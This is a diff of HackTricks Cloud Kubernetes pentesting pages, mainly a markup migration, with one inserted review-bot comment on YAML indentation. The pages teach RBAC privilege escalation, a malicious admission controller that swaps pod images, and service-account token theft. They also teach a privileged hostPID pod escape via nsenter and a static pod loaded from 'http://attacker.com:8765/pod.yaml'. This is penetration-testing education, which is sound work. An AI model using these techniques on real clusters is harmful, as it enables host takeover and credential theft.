**Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.** The privilege to create Rolebindings allows a user to **bind roles to a service account**. This privilege can potentially lead to privilege escalation because it **allows the user to bind admin privileges to a compromised service account.** 
@@ -589,15 +574,20 @@ Edit your .yaml and add the uncomment lines: # containers: # - name: sec-ctx-demo # image: busybox - command: [ "sh", "-c", "apt update && apt install iptables -y && iptables -L && sleep 1h" ] - securityContext: - capabilities: - add: ["NET_ADMIN"] - # volumeMounts: - # - name: sec-ctx-vol - # mountPath: /data/demo - # securityContext: - # allowPrivilegeEscalation: true +command: + [ + "sh", + "-c", + "apt update && apt install iptables -y && iptables -L && sleep 1h", + ] +securityContext: + capabilities: + add: ["NET_ADMIN"] +# volumeMounts: +# - name: sec-ctx-vol +# mountPath: /data/demo +# securityContext: +# allowPrivilegeEscalation: true ``` See the logs of the proxy: @@ -630,7 +620,7 @@ kubectl get mutatingwebhookconfigurations kubectl get deploy,svc -n webhook-demo ``` -![mutating-webhook-status-check.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433436353/yHUvUWugR.png?auto=compress,format\&format=webp) +![mutating-webhook-status-check.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433436353/yHUvUWugR.png?auto=compress,format&format=webp) Then deploy a new pod: @@ -646,7 +636,7 @@ kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}' kubectl describe po nginx | grep "Image: " ``` -![malicious-admission-controller.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433512073/leFXtgSzm.png?auto=compress,format\&format=webp) +![malicious-admission-controller.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433512073/leFXtgSzm.png?auto=compress,format&format=webp) As you can see in the above image, we tried running image `nginx` but the final executed image is `rewanthtammana/malicious-image`. What just happened!!? 
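Review bot: The reformatted securityContext snippet appears to place `command:` and `securityContext:` at column 0, while the removed lines had them indented under the commented-out `# - name: sec-ctx-demo` container entry; at top level they are no longer keys of that container and the fragment stops showing where the lines belong in the pod `spec`. The commented `# volumeMounts:` and `# securityContext:` lines seem to have lost the same indentation. Keep the indentation of the removed side (or mark the block so the formatter leaves it untouched) so the "uncomment these lines" instruction above it still makes sense.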
@@ -666,50 +656,43 @@ The above snippet replaces the first container image in every pod with `rewantht ## OPA Gatekeeper bypass -{% content-ref url="../kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md" %} -[kubernetes-opa-gatekeeper-bypass.md](../kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) -{% endcontent-ref %} +{{#ref}} +../kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md +{{#endref}} ## Best Practices ### **Disabling Automount of Service Account Tokens** -* **Pods and Service Accounts**: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature. -* **How to Apply**: Set `automountServiceAccountToken: false` in the configuration of service accounts or pods starting from Kubernetes version 1.6. +- **Pods and Service Accounts**: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature. +- **How to Apply**: Set `automountServiceAccountToken: false` in the configuration of service accounts or pods starting from Kubernetes version 1.6. ### **Restrictive User Assignment in RoleBindings/ClusterRoleBindings** -* **Selective Inclusion**: Ensure that only necessary users are included in RoleBindings or ClusterRoleBindings. Regularly audit and remove irrelevant users to maintain tight security. +- **Selective Inclusion**: Ensure that only necessary users are included in RoleBindings or ClusterRoleBindings. Regularly audit and remove irrelevant users to maintain tight security. ### **Namespace-Specific Roles Over Cluster-Wide Roles** -* **Roles vs. ClusterRoles**: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions. +- **Roles vs. 
ClusterRoles**: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions. ### **Use automated tools** -{% embed url="https://github.com/cyberark/KubiScan" %} +{{#ref}} +https://github.com/cyberark/KubiScan +{{#endref}} -{% embed url="https://github.com/aquasecurity/kube-hunter" %} +{{#ref}} +https://github.com/aquasecurity/kube-hunter +{{#endref}} -{% embed url="https://github.com/aquasecurity/kube-bench" %} +{{#ref}} +https://github.com/aquasecurity/kube-bench +{{#endref}} ## **References** -* [**https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions**](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions) -* [**https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1**](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1) -* [**https://blog.rewanthtammana.com/creating-malicious-admission-controllers**](https://blog.rewanthtammana.com/creating-malicious-admission-controllers) +- [**https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions**](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions) +- [**https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1**](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1) +- [**https://blog.rewanthtammana.com/creating-malicious-admission-controllers**](https://blog.rewanthtammana.com/creating-malicious-admission-controllers) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert 
(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md similarity index 80% rename from pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md rename to src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md index c32fbcd56..30b1a245e 100644 --- a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md +++ b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md @@ -1,19 +1,6 @@ # Kubernetes Roles Abuse Lab -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} You can run these labs just inside **minikube**. 
@@ -21,18 +8,17 @@ You can run these labs just inside **minikube**. We are going to create: -* A **Service account "test-sa"** with a cluster privilege to **read secrets** - * A ClusterRole "test-cr" and a ClusterRoleBinding "test-crb" will be created -* **Permissions** to list and **create** pods to a user called "**Test**" will be given - * A Role "test-r" and RoleBinding "test-rb" will be created -* Then we will **confirm** that the SA can list secrets and that the user Test can list a pods -* Finally we will **impersonate the user Test** to **create a pod** that includes the **SA test-sa** and **steal** the service account **token.** - * This is the way yo show the user could escalate privileges this way +- A **Service account "test-sa"** with a cluster privilege to **read secrets** + - A ClusterRole "test-cr" and a ClusterRoleBinding "test-crb" will be created +- **Permissions** to list and **create** pods to a user called "**Test**" will be given + - A Role "test-r" and RoleBinding "test-rb" will be created +- Then we will **confirm** that the SA can list secrets and that the user Test can list a pods +- Finally we will **impersonate the user Test** to **create a pod** that includes the **SA test-sa** and **steal** the service account **token.** + - This is the way yo show the user could escalate privileges this way -{% hint style="info" %} -To create the scenario an admin account is used.\ -Moreover, to **exfiltrate the sa token** in this example the **admin account is used** to exec inside the created pod. However, **as explained here**, the **declaration of the pod could contain the exfiltration of the token**, so the "exec" privilege is not necesario to exfiltrate the token, the **"create" permission is enough**. -{% endhint %} +> [!NOTE] +> To create the scenario an admin account is used.\ +> Moreover, to **exfiltrate the sa token** in this example the **admin account is used** to exec inside the created pod. 
However, **as explained here**, the **declaration of the pod could contain the exfiltration of the token**, so the "exec" privilege is not necesario to exfiltrate the token, the **"create" permission is enough**. ```bash # Create Service Account test-sa @@ -349,11 +335,11 @@ kubectl delete serviceaccount test-sa **Doesn't work:** -* **Create a new RoleBinding** just with the verb **create** -* **Create a new RoleBinding** just with the verb **patch** (you need to have the binding permissions) - * You cannot do this to assign the role to yourself or to a different SA -* **Modify a new RoleBinding** just with the verb **patch** (you need to have the binding permissions) - * You cannot do this to assign the role to yourself or to a different SA +- **Create a new RoleBinding** just with the verb **create** +- **Create a new RoleBinding** just with the verb **patch** (you need to have the binding permissions) + - You cannot do this to assign the role to yourself or to a different SA +- **Modify a new RoleBinding** just with the verb **patch** (you need to have the binding permissions) + - You cannot do this to assign the role to yourself or to a different SA ```bash echo 'apiVersion: v1 @@ -623,17 +609,4 @@ kubectl delete role test-r2 kubectl delete serviceaccount test-sa ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
new file mode 100644
index 000000000..c9e6f8470
--- /dev/null
+++ b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
@@ -0,0 +1,49 @@
+# Pod Escape Privileges
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Privileged and hostPID
+
+With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\
+Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).
+
+Just executing something like the following will allow you to escape from the pod:
+
+```bash
+nsenter --target 1 --mount --uts --ipc --net --pid -- bash
+```
+
+Configuration example:
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+ name: priv-and-hostpid-exec-pod
+ labels:
+ app: pentest
+spec:
+ hostPID: true
+ containers:
+ - name: priv-and-hostpid-pod
+ image: ubuntu
+ tty: true
+ securityContext:
+ privileged: true
+ command:
+ [
+ "nsenter",
+ "--target",
+ "1",
+ "--mount",
+ "--uts",
+ "--ipc",
+ "--net",
+ "--pid",
+ "--",
+ "bash",
+ ]
+ #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md similarity index 72% rename from pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md rename to src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md index 411155257..e95909ad1 100644 --- a/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md +++ b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md @@ -1,19 +1,6 @@ # Attacking Kubernetes from inside a Pod -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## **Pod Breakout** 
@@ -25,25 +12,29 @@ Learn & practice GCP Hacking: [!CAUTION] +> The **`spec` of a static Pod cannot refer to other API objects** (e.g., ServiceAccount, ConfigMap, Secret, etc. So **you cannot abuse this behaviour to launch a pod with an arbitrary serviceAccount** in the current node to compromise the cluster. But you could use this to run pods in different namespaces (in case thats useful for some reason). If you are inside the node host you can make it create a **static pod inside itself**. This is pretty useful because it might allow you to **create a pod in a different namespace** like **kube-system**. In order to create a static pod, the [**docs are a great help**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/). You basically need 2 things: -* Configure the param **`--pod-manifest-path=/etc/kubernetes/manifests`** in the **kubelet service**, or in the **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) and restart the service -* Create the definition on the **pod definition** in **`/etc/kubernetes/manifests`** +- Configure the param **`--pod-manifest-path=/etc/kubernetes/manifests`** in the **kubelet service**, or in the **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) and restart the service +- Create the definition on the **pod definition** in **`/etc/kubernetes/manifests`** **Another more stealth way would be to:** -* Modify the param **`staticPodURL`** from **kubelet** config file and set something like `staticPodURL: http://attacker.com:8765/pod.yaml`. This will make the kubelet process create a **static pod** getting the **configuration from the indicated URL**. +- Modify the param **`staticPodURL`** from **kubelet** config file and set something like `staticPodURL: http://attacker.com:8765/pod.yaml`. 
This will make the kubelet process create a **static pod** getting the **configuration from the indicated URL**. **Example** of **pod** configuration to create a privilege pod in **kube-system** taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/): @@ -317,22 +303,22 @@ metadata: namespace: kube-system spec: containers: - - name: bad - hostPID: true - image: gcr.io/shmoocon-talk-hacking/brick - stdin: true - tty: true - imagePullPolicy: IfNotPresent - volumeMounts: - - mountPath: /chroot - name: host + - name: bad + hostPID: true + image: gcr.io/shmoocon-talk-hacking/brick + stdin: true + tty: true + imagePullPolicy: IfNotPresent + volumeMounts: + - mountPath: /chroot + name: host securityContext: privileged: true volumes: - - name: host - hostPath: - path: / - type: Directory + - name: host + hostPath: + path: / + type: Directory ``` ### Delete pods + unschedulable nodes @@ -342,7 +328,7 @@ For [**more info follow this links**](abusing-roles-clusterroles-in-kubernetes/# ## Automatic Tools -* [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates) +- [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates) ``` Peirates v1.1.8-beta by InGuardians @@ -404,19 +390,6 @@ Off-Menu + [exit] Exit Peirates ``` -* [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI) +- [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md b/src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md similarity index 67% rename from pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md rename to src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md index fec9cdaec..8f96b119f 100644 --- a/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md +++ b/src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md @@ -1,19 +1,6 @@ # Exposing Services in Kubernetes -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 There are **different ways to expose services** in Kubernetes so both **internal** endpoints and **external** endpoints can access them. This Kubernetes configuration is pretty critical as the administrator could give access to **attackers to services they shouldn't be able to access**.
@@ -56,28 +43,26 @@ to access this service:
 ```yaml
 apiVersion: v1
 kind: Service
-metadata:
+metadata:
 name: my-internal-service
 spec:
 selector:
 app: my-app
 type: ClusterIP
- ports:
- - name: http
- port: 80
- targetPort: 80
- protocol: TCP
+ ports:
+ - name: http
+ port: 80
+ targetPort: 80
+ protocol: TCP
 ```
 _This method requires you to run `kubectl` as an **authenticated user**._
 List all ClusterIPs:
-{% code overflow="wrap" %}
 ```bash
 kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,PORT(S):.spec.ports[*].port,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep ClusterIP
 ```
-{% endcode %}
 ### NodePort
@@ -85,29 +70,27 @@ When **NodePort** is utilised, a designated port is made available on all Nodes
 List all NodePorts:
-{% code overflow="wrap" %}
 ```bash
 kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,PORT(S):.spec.ports[*].port,NODEPORT(S):.spec.ports[*].nodePort,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep NodePort
 ```
-{% endcode %}
 An example of NodePort specification:
 ```yaml
 apiVersion: v1
 kind: Service
-metadata:
+metadata:
 name: my-nodeport-service
 spec:
- selector:
+ selector:
 app: my-app
 type: NodePort
- ports:
- - name: http
- port: 80
- targetPort: 80
- nodePort: 30036
- protocol: TCP
+ ports:
+ - name: http
+ port: 80
+ targetPort: 80
+ nodePort: 30036
+ protocol: TCP
 ```
 If you **don't specify** the **nodePort** in the yaml (it's the port that will be opened) a port in the **range 30000–32767 will be used**.
@@ -120,19 +103,16 @@ You have to pay for a LoadBalancer per exposed service, which can be expensive.
 List all LoadBalancers:
-{% code overflow="wrap" %}
 ```bash
 kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,EXTERNAL-IP:.status.loadBalancer.ingress[*],PORT(S):.spec.ports[*].port,NODEPORT(S):.spec.ports[*].nodePort,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep LoadBalancer
 ```
-{% endcode %}
 ### External IPs
-{% hint style="success" %}
-External IPs are exposed by services of type Load Balancers and they are generally used when an external Cloud Provider Load Balancer is being used.
-
-For finding them, check for load balancers with values in the `EXTERNAL-IP` field.
-{% endhint %}
+> [!TIP]
+> External IPs are exposed by services of type Load Balancers and they are generally used when an external Cloud Provider Load Balancer is being used.
+>
+> For finding them, check for load balancers with values in the `EXTERNAL-IP` field.
 Traffic that ingresses into the cluster with the **external IP** (as **destination IP**), on the Service port, will be **routed to one of the Service endpoints**. `externalIPs` are not managed by Kubernetes and are the responsibility of the cluster administrator.
@@ -176,11 +156,9 @@ When looking up the host `my-service.prod.svc.cluster.local`, the cluster DNS Se
 List all ExternalNames:
-{% code overflow="wrap" %}
 ```bash
 kubectl get services --all-namespaces | grep ExternalName
 ```
-{% endcode %}
 ### Ingress
@@ -202,28 +180,26 @@ spec:
 serviceName: other
 servicePort: 8080
 rules:
- - host: foo.mydomain.com
- http:
- paths:
- - backend:
- serviceName: foo
- servicePort: 8080
- - host: mydomain.com
- http:
- paths:
- - path: /bar/*
- backend:
- serviceName: bar
- servicePort: 8080
+ - host: foo.mydomain.com
+ http:
+ paths:
+ - backend:
+ serviceName: foo
+ servicePort: 8080
+ - host: mydomain.com
+ http:
+ paths:
+ - path: /bar/*
+ backend:
+ serviceName: bar
+ servicePort: 8080
 ```
 List all the ingresses:
-{% code overflow="wrap" %}
 ```bash
 kubectl get ingresses --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,RULES:spec.rules[*],STATUS:status'
 ```
-{% endcode %}
 Although in this case it's better to get the info of each one by one to read it better:
@@ -233,20 +209,7 @@ kubectl get ingresses --all-namespaces -o=yaml
 ### References
-* [https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0](https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0)
-* [https://kubernetes.io/docs/concepts/services-networking/service/](https://kubernetes.io/docs/concepts/services-networking/service/)
+- [https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0](https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0)
+- [https://kubernetes.io/docs/concepts/services-networking/service/](https://kubernetes.io/docs/concepts/services-networking/service/)
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
- -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/kubernetes-basics.md b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md similarity index 71% rename from pentesting-cloud/kubernetes-security/kubernetes-basics.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-basics.md index 61bfad269..1625346aa 100644 --- a/pentesting-cloud/kubernetes-security/kubernetes-basics.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md @@ -2,20 +2,7 @@ ## Kubernetes Basics -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} **The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)** @@ -23,30 +10,30 @@ Learn & practice GCP Hacking: [!NOTE] +> This is useful for testing but for production you should have only internal services and an Ingress to expose the application. **Example of Ingress config file** @@ -265,12 +251,12 @@ metadata: namespace: kubernetes-dashboard spec: rules: - - host: dashboard.com - http: - paths: - - backend: - serviceName: kubernetes-dashboard - servicePort: 80 + - host: dashboard.com + http: + paths: + - backend: + serviceName: kubernetes-dashboard + servicePort: 80 ``` **Example of secrets config file** @@ -281,11 +267,11 @@ Note how the password are encoded in B64 (which isn't secure!) apiVersion: v1 kind: Secret metadata: - name: mongodb-secret + name: mongodb-secret type: Opaque data: - mongo-root-username: dXNlcm5hbWU= - mongo-root-password: cGFzc3dvcmQ= + mongo-root-username: dXNlcm5hbWU= + mongo-root-password: cGFzc3dvcmQ= ``` **Example of ConfigMap** @@ -317,7 +303,7 @@ spec: - containerPort: 8081 env: - name: ME_CONFIG_MONGODB_SERVER - valueFrom: + valueFrom: configMapKeyRef: name: mongodb-configmap key: database_url 
@@ -346,24 +332,23 @@ kube-public Active 1d
 kube-system Active 1d
 ```
-* **kube-system**: It's not meant or the users use and you shouldn't touch it. It's for master and kubectl processes.
-* **kube-public**: Publicly accessible date. Contains a configmap which contains cluster information
-* **kube-node-lease**: Determines the availability of a node
-* **default**: The namespace the user will use to create resources
+- **kube-system**: It's not meant or the users use and you shouldn't touch it. It's for master and kubectl processes.
+- **kube-public**: Publicly accessible date. Contains a configmap which contains cluster information
+- **kube-node-lease**: Determines the availability of a node
+- **default**: The namespace the user will use to create resources
 ```bash
 #Create namespace
 kubectl create namespace my-namespace
 ```
-{% hint style="info" %}
-Note that most Kubernetes resources (e.g. pods, services, replication controllers, and others) are in some namespaces. However, other resources like namespace resources and low-level resources, such as nodes and persistenVolumes are not in a namespace. To see which Kubernetes resources are and aren’t in a namespace:
-
-```bash
-kubectl api-resources --namespaced=true #In a namespace
-kubectl api-resources --namespaced=false #Not in a namespace
-```
-{% endhint %}
+> [!NOTE]
+> Note that most Kubernetes resources (e.g. pods, services, replication controllers, and others) are in some namespaces. However, other resources like namespace resources and low-level resources, such as nodes and persistenVolumes are not in a namespace. To see which Kubernetes resources are and aren’t in a namespace:
+>
+> ```bash
+> kubectl api-resources --namespaced=true #In a namespace
+> kubectl api-resources --namespaced=false #Not in a namespace
+> ```
 You can save the namespace for all subsequent kubectl commands in that context.
@@ -387,11 +372,11 @@ A **Secret** is an object that **contains sensitive data** such as a password, a
 Secrets might be things like:
-* API, SSH Keys.
-* OAuth tokens.
-* Credentials, Passwords (plain text or b64 + encryption).
-* Information or comments.
-* Database connection code, strings… .
+- API, SSH Keys.
+- OAuth tokens.
+- Credentials, Passwords (plain text or b64 + encryption).
+- Information or comments.
+- Database connection code, strings… .
 There are different types of secrets in Kubernetes
@@ -406,9 +391,8 @@ There are different types of secrets in Kubernetes
 | kubernetes.io/tls | data for a TLS client or server |
 | bootstrap.kubernetes.io/token | bootstrap token data |
-{% hint style="info" %}
-**The Opaque type is the default one, the typical key-value pair defined by users.**
-{% endhint %}
+> [!NOTE]
+> **The Opaque type is the default one, the typical key-value pair defined by users.**
 **How secrets works:**
@@ -416,8 +400,7 @@ There are different types of secrets in Kubernetes
 The following configuration file defines a **secret** called `mysecret` with 2 key-value pairs `username: YWRtaW4=` and `password: MWYyZDFlMmU2N2Rm`. It also defines a **pod** called `secretpod` that will have the `username` and `password` defined in `mysecret` exposed in the **environment variables** `SECRET_USERNAME` \_\_ and \_\_ `SECRET_PASSWOR`. It will also **mount** the `username` secret inside `mysecret` in the path `/etc/foo/my-group/my-username` with `0640` permissions.
